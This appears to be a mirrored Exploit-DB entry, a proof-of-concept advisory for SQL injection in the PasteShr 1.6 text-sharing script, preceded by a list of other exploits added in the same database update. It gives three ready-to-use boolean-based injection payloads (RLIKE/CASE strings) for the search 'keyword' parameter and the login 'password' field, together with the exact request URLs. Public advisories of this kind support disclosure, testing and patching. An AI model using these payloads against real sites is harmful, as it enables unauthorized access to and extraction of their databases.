bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/46847.txt
Offensive Security b04843e5cb DB: 2019-05-15 
9 changes to exploits/shellcodes

Selfie Studio 2.17 - 'Resize Image' Denial of Service (PoC)
TwistedBrush Pro Studio 24.06 - 'Resize Image' Denial of Service (PoC)
TwistedBrush Pro Studio 24.06 - 'Script Recorder' Denial of Service (PoC)
TwistedBrush Pro Studio 24.06 - '.srp' Denial of Service (PoC)

PHP-Fusion 9.03.00 - 'Edit Profile' Remote Code Execution (Metasploit)
Sales ERP 8.1 - Multiple SQL Injection
D-Link DWL-2600AP - Multiple OS Command Injection
Schneider Electric U.Motion Builder 1.3.4 - 'track_import_export.php object_id' Unauthenticated Command Injection
PasteShr 1.6 - Multiple SQL Injection
2019-05-15 05:01:56 +00:00

78 lines
No EOL
3.6 KiB
Text
Raw Blame History

===========================================================================================
# Exploit Title: PasteShr - SQL İnj.
# Dork: N/A
# Date: 14-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437
# Software Link:
https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html
# Version: v1.6
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Pasteshr is a script which allows you to store any
text online for easy sharing.
The idea behind the script is to make it more convenient for people to
share large amounts of text online.
===========================================================================================
# POC - SQLi
# Parameters : keyword
# Attack Pattern :
%27/**/RLIKE/**/(case/**/when/**//**/9494586=9494586/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'='
# GET Method : http://localhost/pasthr/public/search?keyword=4137548[SQL
Inject Here]
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: PasteShr - SQL İnj.
# Dork: N/A
# Date: 14-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437
# Software Link:
https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html
# Version: v1.6
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Pasteshr is a script which allows you to store any
text online for easy sharing.
The idea behind the script is to make it more convenient for people to
share large amounts of text online.
===========================================================================================
# POC - SQLi
# Parameters : password
# Attack Pattern :
/**/RLIKE/**/(case/**/when/**//**/6787556=6787556/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)
# POST Method :
http://localhost/pasthr/public/login?_token=1lkW1Z61RZlmfYB0Ju07cfekR6UvsqaFAfeZfi2c&email=2270391&password=6195098[SQL
Inject Here]
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: PasteShr - SQL İnj.
# Dork: N/A
# Date: 14-05-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage:
https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437
# Software Link:
https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html
# Version: v1.6
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: Pasteshr is a script which allows you to store any
text online for easy sharing.
The idea behind the script is to make it more convenient for people to
share large amounts of text online.
===========================================================================================
# POC - SQLi
# Parameters : keyword
# Attack Pattern :
%27/**/RLIKE/**/(case/**/when/**//**/8266715=8266715/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'='
# POST Method :
http://localhost/pasthr/server.php/search?keyword=1901418[SQL Inject Here]
===========================================================================================
Reference in a new issue View git blame Copy permalink